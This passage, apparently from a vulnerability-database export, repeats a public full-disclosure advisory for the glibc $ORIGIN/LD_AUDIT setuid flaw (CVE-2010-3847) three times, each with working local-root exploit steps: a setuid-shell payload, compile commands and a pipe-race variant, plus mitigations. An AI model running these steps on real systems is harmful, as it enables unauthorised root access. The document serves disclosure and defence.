system("/bin/bash");\r\n}\r\n^D\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n$ ls -l /tmp/exploit\r\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\r\n\r\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\r\n$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3\r\nsh-4.1# whoami\r\nroot\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIt is a good idea to prevent users from creating files on filesystems mounted\r\nwithout nosuid. The following interesting solution for administrators who\r\ncannot modify their partitioning scheme was suggested to me by Rob Holland\r\n(@robholland):\r\n\r\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\r\nfor example:\r\n\r\n# mount -o bind /tmp /tmp\r\n# mount -o remount,bind,nosuid /tmp /tmp\r\n\r\nBe aware of race conditions at boot via crond/atd/etc, and users with\r\nreferences to existing directories (man lsof), but this may be an acceptable\r\nworkaround until a patch is ready for deployment.\r\n\r\n(Of course you need to do this everywhere untrusted users can make links to\r\nsuid/sgid binaries. find(1) is your friend).\r\n\r\nIf someone wants to create an init script that would automate this at boot for\r\ntheir distribution, I'm sure it would be appreciated by other administrators.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMajor distributions should be releasing updated glibc packages shortly.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\r\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\r\nand all my other elite friends and colleagues.\r\n\r\nAdditional greetz to the openwall guys who saw this problem coming years ago.\r\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\r\ntheir insight into systems security.\r\n\r\nhttp://www.openwall.com/owl/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nThere are several known techniques to exploit dynamic loader bugs for suid\r\nbinaries, the fexecve() technique listed in the Consequences section above is a\r\nmodern technique, making use of relatively recent Linux kernel features (it was\r\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\r\nbelieve Gabriel Campana came up with the same solution independently).\r\n\r\nThe classic UNIX technique is a little less elegant, but has the advantage that\r\nread access is not required for the target binary. It is rather common for\r\nadministrators to remove read access from suid binaries in order to make\r\nattackers work a little harder, so I will document it here for reference.\r\n\r\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\r\nbytes capacity on Linux, see the section on "Pipe Capacity" in pipe(7) from the\r\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\r\nanything written to stderr will block, so you simply execve() and then make the\r\nloader print some error message, allowing you to reliably win any race\r\ncondition.\r\n\r\nLD_DEBUG has always been a a good candidate for getting error messages on\r\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\r\nsome minor complaints about information leaks, but it can still be used with a\r\nslight modification (I first learned of this technique from a bugtraq posting\r\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\r\n\r\nThe exploit flow for this alternative attack is a little more complicated, but\r\nwe can still use the shell to do it (this session is from an FC13 system,\r\noutput cleaned up for clarity).\r\n\r\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\r\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN"\r\n/tmp/exploit/target 2>&1) | (sleep 1h; cat) &\r\n[1] 26926\r\n\r\n# Now ld.so is blocked on write() in the background trying to say "invalid\r\n# debug option", so we are free to manipulate the filesystem.\r\n$ rm -rf /tmp/exploit/\r\n\r\n# Put exploit payload in place.\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n\r\n# Clear the pipe by killing sleep, letting cat drain the contents. This will\r\n# unblock the target, allowing it to continue.\r\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\r\n-bash: line 99: 26929 Terminated sleep 1h\r\n\r\n# And now we can take control of a root shell :-)\r\n$ fg\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\r\nwhile the loader is trying to map lots of memory, you have a good chance of\r\nwinning any race. I previously found an integer overflow in this feature and\r\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\r\nmaintainers disagreed and just fixed the overflow.\r\n\r\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\r\n\r\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\r\nnext big loader bug is going to be, it's just not safe to let attackers have\r\nthat much control over the execution environment of privileged programs.\r\n\r\nFinally, some notes on ELF security for newcomers. The following common\r\nconditions are usually exploitable:\r\n\r\n - An empty DT_RPATH, i.e. -Wl,-rpath,""\r\n This is a surprisingly common build error, due to variable expansion\r\n failing during the build process.\r\n - A relative, rather than absolute DT_RPATH.\r\n For example, -Wl,-rpath,"lib/foo".\r\n\r\nI'll leave it as an exercise for the interested reader to explain why. Remember\r\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\r\nfor their dependencies, and so on.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\r\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux\r\nProgrammer's Manual.\r\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux\r\nProgrammer's Manual.\r\n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0.\r\n- Partitioning schemes and security,\r\nhttp://my.opera.com/taviso/blog/show.dml/654574\r\n- CVE-2009-1894 description,\r\nhttp://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\r\n\r\nYou should subscribe to Linux Weekly News and help support their high standard\r\nof security journalism.\r\n\r\nhttp://lwn.net/\r\n\r\nI have a twitter account where I occasionally comment on security topics.\r\n\r\nhttp://twitter.com/taviso\r\n\r\nex$$\r\n\r\n-- \r\n-------------------------------------\r\ntaviso@cmpxchg8b.com | pgp encrypted mail preferred\r\n-------------------------------------------------------", "edition": 1, "cvss3": {}, "published": "2010-10-24T00:00:00", "title": "The GNU C library dynamic linker expands $ORIGIN in setuid library search path", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-24T00:00:00", "id": "SECURITYVULNS:DOC:24977", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24977", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:17", "description": "\nGNU C library dynamic linker - $ORIGIN Expansion", "edition": 2, "cvss3": {}, "published": "2010-10-18T00:00:00", "title": "GNU C library dynamic linker - $ORIGIN Expansion", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-18T00:00:00", "id": "EXPLOITPACK:FC124E21A6FD828BCB8AB10DC2D60915", "href": "", "sourceData": "from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\n\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\n------------------------------------------------------------------------------\n\nGruezi, This is CVE-2010-3847.\n\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\ndynamically linked programs. ld.so operates in two security modes, a permissive\nmode that allows a high degree of control over the load operation, and a secure\nmode (libc_enable_secure) intended to prevent users from interfering with the\nloading of privileged executables.\n\n$ORIGIN is an ELF substitution sequence representing the location of the\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\nexecutables to specify a search path for libraries that is relative to their\nlocation, to simplify packaging without spamming the standard search paths with\nsingle-use libraries.\n\nNote that despite the confusing naming convention, $ORIGIN is specified in a\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\nenvironment (developers would normally use the -rpath ld parameter, or\n-Wl,-rpath,$ORIGIN via the compiler driver).\n\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\nbinaries,\n\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\n\n\"For security, the dynamic linker does not allow use of $ORIGIN substitution\n sequences for set-user and set-group ID programs. For such sequences that\n appear within strings specified by DT_RUNPATH dynamic array entries, the\n specific search path containing the $ORIGIN sequence is ignored (though other\n search paths in the same string are processed). $ORIGIN sequences within a\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\n errors. The same restrictions may be applied to processes that have more than\n minimal privileges on systems with installed extended security mechanisms.\"\n\nHowever, glibc ignores this recommendation. The attack the ELF designers were\nlikely concerned about is users creating hardlinks to suid executables in\ndirectories they control and then executing them, thus controlling the\nexpansion of $ORIGIN.\n\nIt is tough to form a thorough complaint about this glibc behaviour however,\nas any developer who believes they're smart enough to safely create suid\nprograms should be smart enough to understand the implications of $ORIGIN\nand hard links on load behaviour. The glibc maintainers are some of the\nsmartest guys in free software, and well known for having a \"no hand-holding\"\nstance on various issues, so I suspect they wanted a better argument than this\nfor modifying the behaviour (I pointed it out a few years ago, but there was\nlittle interest).\n\nHowever, I have now discovered a way to exploit this. The origin expansion\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\nto prevent it from working, it is insufficient.\n\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\n\nThe codepath that triggers this expansion is\n\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\n\n(in the code below DST is dynamic string token)\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\n\n 741 /* Expand DSTs. */\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\n 743 if (__builtin_expect (cnt == 0, 1))\n 744 llp_tmp = strdupa (llp);\n 745 else\n 746 {\n 747 /* Determine the length of the substituted string. */\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\n 749\n 750 /* Allocate the necessary memory. */\n 751 llp_tmp = (char *) alloca (total + 1);\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\n 753 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\n\n 253 if (__builtin_expect (*name == '$', 0))\n 254 {\n 255 const char *repl = NULL;\n 256 size_t len;\n 257\n 258 ++name;\n 259 if ((len = is_dst (start, name, \"ORIGIN\", is_path,\n 260 INTUSE(__libc_enable_secure))) != 0)\n 261 {\n ...\n 267 repl = l->l_origin;\n 268 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\n\n\n 202 if (__builtin_expect (secure, 0)\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\n 205 return 0;\n 206\n 207 return len;\n 208 }\n\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\nThis makes little sense, and does not appear to be useful even if there were\nno security impact. This was most likely the result of an attempt to re-use the\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\nintroducing this error.\n\nPerhaps surprisingly, this error is exploitable.\n\n--------------------\nAffected Software\n------------------------\n\nAt least the following versions have been tested\n\n 2.12.1, FC13\n 2.5, RHEL5 / CentOS5\n\nOther versions are probably affected, possibly via different vectors. I'm aware\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\ndo not know if it's possible to avoid this.\n\n--------------------\nConsequences\n-----------------------\n\nIt is possible to exploit this flaw to execute arbitrary code as root.\n\nPlease note, this is a low impact vulnerability that is only of interest to\nsecurity professionals and system administrators. End users do not need\nto be concerned.\n\nExploitation would look like the following.\n\n# Create a directory in /tmp we can control.\n$ mkdir /tmp/exploit\n\n# Link to an suid binary, thus changing the definition of $ORIGIN.\n$ ln /bin/ping /tmp/exploit/target\n\n# Open a file descriptor to the target binary (note: some users are surprised\n# to learn exec can be used to manipulate the redirections of the current\n# shell if a command is not specified. This is what is happening below).\n$ exec 3< /tmp/exploit/target\n\n# This descriptor should now be accessible via /proc.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\n\n# Remove the directory previously created\n$ rm -rf /tmp/exploit/\n\n# The /proc link should still exist, but now will be marked deleted.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\n\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\n$ cat > payload.c\nvoid __attribute__((constructor)) init()\n{\n setuid(0);\n system(\"/bin/bash\");\n}\n^D\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n$ ls -l /tmp/exploit\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\n\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3\nsh-4.1# whoami\nroot\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\n-------------------\nMitigation\n-----------------------\n\nIt is a good idea to prevent users from creating files on filesystems mounted\nwithout nosuid. The following interesting solution for administrators who\ncannot modify their partitioning scheme was suggested to me by Rob Holland\n(@robholland):\n\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\nfor example:\n\n# mount -o bind /tmp /tmp\n# mount -o remount,bind,nosuid /tmp /tmp\n\nBe aware of race conditions at boot via crond/atd/etc, and users with\nreferences to existing directories (man lsof), but this may be an acceptable\nworkaround until a patch is ready for deployment.\n\n(Of course you need to do this everywhere untrusted users can make links to\nsuid/sgid binaries. find(1) is your friend).\n\nIf someone wants to create an init script that would automate this at boot for\ntheir distribution, I'm sure it would be appreciated by other administrators.\n\n-------------------\nSolution\n-----------------------\n\nMajor distributions should be releasing updated glibc packages shortly.\n\n-------------------\nCredit\n-----------------------\n\nThis bug was discovered by Tavis Ormandy.\n\n-------------------\nGreetz\n-----------------------\n\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\nand all my other elite friends and colleagues.\n\nAdditional greetz to the openwall guys who saw this problem coming years ago.\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\ntheir insight into systems security.\n\nhttp://www.openwall.com/owl/\n\n-------------------\nNotes\n-----------------------\n\nThere are several known techniques to exploit dynamic loader bugs for suid\nbinaries, the fexecve() technique listed in the Consequences section above is a\nmodern technique, making use of relatively recent Linux kernel features (it was\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\nbelieve Gabriel Campana came up with the same solution independently).\n\nThe classic UNIX technique is a little less elegant, but has the advantage that\nread access is not required for the target binary. It is rather common for\nadministrators to remove read access from suid binaries in order to make\nattackers work a little harder, so I will document it here for reference.\n\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\nanything written to stderr will block, so you simply execve() and then make the\nloader print some error message, allowing you to reliably win any race\ncondition.\n\nLD_DEBUG has always been a a good candidate for getting error messages on\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\nsome minor complaints about information leaks, but it can still be used with a\nslight modification (I first learned of this technique from a bugtraq posting\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\n\nThe exploit flow for this alternative attack is a little more complicated, but\nwe can still use the shell to do it (this session is from an FC13 system,\noutput cleaned up for clarity).\n\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\n[1] 26926\n\n# Now ld.so is blocked on write() in the background trying to say \"invalid\n# debug option\", so we are free to manipulate the filesystem.\n$ rm -rf /tmp/exploit/\n\n# Put exploit payload in place.\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n\n# Clear the pipe by killing sleep, letting cat drain the contents. This will\n# unblock the target, allowing it to continue.\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\n-bash: line 99: 26929 Terminated sleep 1h\n\n# And now we can take control of a root shell :-)\n$ fg\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\nwhile the loader is trying to map lots of memory, you have a good chance of\nwinning any race. I previously found an integer overflow in this feature and\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\nmaintainers disagreed and just fixed the overflow.\n\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\n\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\nnext big loader bug is going to be, it's just not safe to let attackers have\nthat much control over the execution environment of privileged programs.\n\nFinally, some notes on ELF security for newcomers. The following common\nconditions are usually exploitable:\n\n - An empty DT_RPATH, i.e. -Wl,-rpath,\"\"\n This is a surprisingly common build error, due to variable expansion\n failing during the build process.\n - A relative, rather than absolute DT_RPATH.\n For example, -Wl,-rpath,\"lib/foo\".\n\nI'll leave it as an exercise for the interested reader to explain why. Remember\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\nfor their dependencies, and so on.\n\n-------------------\nReferences\n-----------------------\n\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0.\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\n\nYou should subscribe to Linux Weekly News and help support their high standard\nof security journalism.\n\nhttp://lwn.net/\n\nI have a twitter account where I occasionally comment on security topics.\n\nhttp://twitter.com/taviso\n\nex$$", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:55", "description": "", "cvss3": {}, "published": "2010-10-19T00:00:00", "type": "packetstorm", "title": "GNU C Library Dynamic Linker $ORIGIN Expansion Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-19T00:00:00", "id": "PACKETSTORM:94955", "href": "https://packetstormsecurity.com/files/94955/GNU-C-Library-Dynamic-Linker-ORIGIN-Expansion-Vulnerability.html", "sourceData": "`The GNU C library dynamic linker expands $ORIGIN in setuid library search path \n------------------------------------------------------------------------------ \n \nGruezi, This is CVE-2010-3847. \n \nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of \ndynamically linked programs. ld.so operates in two security modes, a permissive \nmode that allows a high degree of control over the load operation, and a secure \nmode (libc_enable_secure) intended to prevent users from interfering with the \nloading of privileged executables. \n \n$ORIGIN is an ELF substitution sequence representing the location of the \nexecutable being loaded in the filesystem hierarchy. The intention is to allow \nexecutables to specify a search path for libraries that is relative to their \nlocation, to simplify packaging without spamming the standard search paths with \nsingle-use libraries. \n \nNote that despite the confusing naming convention, $ORIGIN is specified in a \nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the \nenvironment (developers would normally use the -rpath ld parameter, or \n-Wl,-rpath,$ORIGIN via the compiler driver). \n \nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID \nbinaries, \n \nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution \n \n\"For security, the dynamic linker does not allow use of $ORIGIN substitution \nsequences for set-user and set-group ID programs. For such sequences that \nappear within strings specified by DT_RUNPATH dynamic array entries, the \nspecific search path containing the $ORIGIN sequence is ignored (though other \nsearch paths in the same string are processed). $ORIGIN sequences within a \nDT_NEEDED entry or path passed as a parameter to dlopen() are treated as \nerrors. The same restrictions may be applied to processes that have more than \nminimal privileges on systems with installed extended security mechanisms.\" \n \nHowever, glibc ignores this recommendation. The attack the ELF designers were \nlikely concerned about is users creating hardlinks to suid executables in \ndirectories they control and then executing them, thus controlling the \nexpansion of $ORIGIN. \n \nIt is tough to form a thorough complaint about this glibc behaviour however, \nas any developer who believes they're smart enough to safely create suid \nprograms should be smart enough to understand the implications of $ORIGIN \nand hard links on load behaviour. The glibc maintainers are some of the \nsmartest guys in free software, and well known for having a \"no hand-holding\" \nstance on various issues, so I suspect they wanted a better argument than this \nfor modifying the behaviour (I pointed it out a few years ago, but there was \nlittle interest). \n \nHowever, I have now discovered a way to exploit this. The origin expansion \nmechanism is recycled for use in LD_AUDIT support, although an attempt is made \nto prevent it from working, it is insufficient. \n \nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit \nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does. \nHowever, $ORIGIN expansion is only prevented if it is not used in isolation. \n \nThe codepath that triggers this expansion is \n \n_dl_init_paths() -> _dl_dst_substitute() -> _is_dst() \n \n(in the code below DST is dynamic string token) \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741 \n \n741 /* Expand DSTs. */ \n742 size_t cnt = DL_DST_COUNT (llp, 1); \n743 if (__builtin_expect (cnt == 0, 1)) \n744 llp_tmp = strdupa (llp); \n745 else \n746 { \n747 /* Determine the length of the substituted string. */ \n748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt); \n749 \n750 /* Allocate the necessary memory. */ \n751 llp_tmp = (char *) alloca (total + 1); \n752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1); \n753 } \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245 \n \n253 if (__builtin_expect (*name == '$', 0)) \n254 { \n255 const char *repl = NULL; \n256 size_t len; \n257 \n258 ++name; \n259 if ((len = is_dst (start, name, \"ORIGIN\", is_path, \n260 INTUSE(__libc_enable_secure))) != 0) \n261 { \n... \n267 repl = l->l_origin; \n268 } \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171 \n \n \n202 if (__builtin_expect (secure, 0) \n203 && ((name[len] != '\\0' && (!is_path || name[len] != ':')) \n204 || (name != start + 1 && (!is_path || name[-2] != ':')))) \n205 return 0; \n206 \n207 return len; \n208 } \n \nAs you can see, $ORIGIN is only expanded if it is alone and first in the path. \nThis makes little sense, and does not appear to be useful even if there were \nno security impact. This was most likely the result of an attempt to re-use the \nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally \nintroducing this error. \n \nPerhaps surprisingly, this error is exploitable. \n \n-------------------- \nAffected Software \n------------------------ \n \nAt least the following versions have been tested \n \n2.12.1, FC13 \n2.5, RHEL5 / CentOS5 \n \nOther versions are probably affected, possibly via different vectors. I'm aware \nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I \ndo not know if it's possible to avoid this. \n \n-------------------- \nConsequences \n----------------------- \n \nIt is possible to exploit this flaw to execute arbitrary code as root. \n \nPlease note, this is a low impact vulnerability that is only of interest to \nsecurity professionals and system administrators. End users do not need \nto be concerned. \n \nExploitation would look like the following. \n \n# Create a directory in /tmp we can control. \n$ mkdir /tmp/exploit \n \n# Link to an suid binary, thus changing the definition of $ORIGIN. \n$ ln /bin/ping /tmp/exploit/target \n \n# Open a file descriptor to the target binary (note: some users are surprised \n# to learn exec can be used to manipulate the redirections of the current \n# shell if a command is not specified. This is what is happening below). \n$ exec 3< /tmp/exploit/target \n \n# This descriptor should now be accessible via /proc. \n$ ls -l /proc/$$/fd/3 \nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target* \n \n# Remove the directory previously created \n$ rm -rf /tmp/exploit/ \n \n# The /proc link should still exist, but now will be marked deleted. \n$ ls -l /proc/$$/fd/3 \nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted) \n \n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen(). \n$ cat > payload.c \nvoid __attribute__((constructor)) init() \n{ \nsetuid(0); \nsystem(\"/bin/bash\"); \n} \n^D \n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c \n$ ls -l /tmp/exploit \n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit* \n \n# Now force the link in /proc to load $ORIGIN via LD_AUDIT. \n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3 \nsh-4.1# whoami \nroot \nsh-4.1# id \nuid=0(root) gid=500(taviso) \n \n------------------- \nMitigation \n----------------------- \n \nIt is a good idea to prevent users from creating files on filesystems mounted \nwithout nosuid. The following interesting solution for administrators who \ncannot modify their partitioning scheme was suggested to me by Rob Holland \n(@robholland): \n \nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid, \nfor example: \n \n# mount -o bind /tmp /tmp \n# mount -o remount,bind,nosuid /tmp /tmp \n \nBe aware of race conditions at boot via crond/atd/etc, and users with \nreferences to existing directories (man lsof), but this may be an acceptable \nworkaround until a patch is ready for deployment. \n \n(Of course you need to do this everywhere untrusted users can make links to \nsuid/sgid binaries. find(1) is your friend). \n \nIf someone wants to create an init script that would automate this at boot for \ntheir distribution, I'm sure it would be appreciated by other administrators. \n \n------------------- \nSolution \n----------------------- \n \nMajor distributions should be releasing updated glibc packages shortly. \n \n------------------- \nCredit \n----------------------- \n \nThis bug was discovered by Tavis Ormandy. \n \n------------------- \nGreetz \n----------------------- \n \nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert, \nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D., \nand all my other elite friends and colleagues. \n \nAdditional greetz to the openwall guys who saw this problem coming years ago. \nThey continue to avoid hundreds of security vulnerabilities each year thanks to \ntheir insight into systems security. \n \nhttp://www.openwall.com/owl/ \n \n------------------- \nNotes \n----------------------- \n \nThere are several known techniques to exploit dynamic loader bugs for suid \nbinaries, the fexecve() technique listed in the Consequences section above is a \nmodern technique, making use of relatively recent Linux kernel features (it was \nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I \nbelieve Gabriel Campana came up with the same solution independently). \n \nThe classic UNIX technique is a little less elegant, but has the advantage that \nread access is not required for the target binary. It is rather common for \nadministrators to remove read access from suid binaries in order to make \nattackers work a little harder, so I will document it here for reference. \n \nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16 \nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the \nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(), \nanything written to stderr will block, so you simply execve() and then make the \nloader print some error message, allowing you to reliably win any race \ncondition. \n \nLD_DEBUG has always been a a good candidate for getting error messages on \nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to \nsome minor complaints about information leaks, but it can still be used with a \nslight modification (I first learned of this technique from a bugtraq posting \nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281). \n \nThe exploit flow for this alternative attack is a little more complicated, but \nwe can still use the shell to do it (this session is from an FC13 system, \noutput cleaned up for clarity). \n \n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection. \n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) & \n[1] 26926 \n \n# Now ld.so is blocked on write() in the background trying to say \"invalid \n# debug option\", so we are free to manipulate the filesystem. \n$ rm -rf /tmp/exploit/ \n \n# Put exploit payload in place. \n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c \n \n# Clear the pipe by killing sleep, letting cat drain the contents. This will \n# unblock the target, allowing it to continue. \n$ pkill -n -t $(tty | sed 's#/dev/##') sleep \n-bash: line 99: 26929 Terminated sleep 1h \n \n# And now we can take control of a root shell :-) \n$ fg \nsh-4.1# id \nuid=0(root) gid=500(taviso) \n \nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then \nwhile the loader is trying to map lots of memory, you have a good chance of \nwinning any race. I previously found an integer overflow in this feature and \nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc \nmaintainers disagreed and just fixed the overflow. 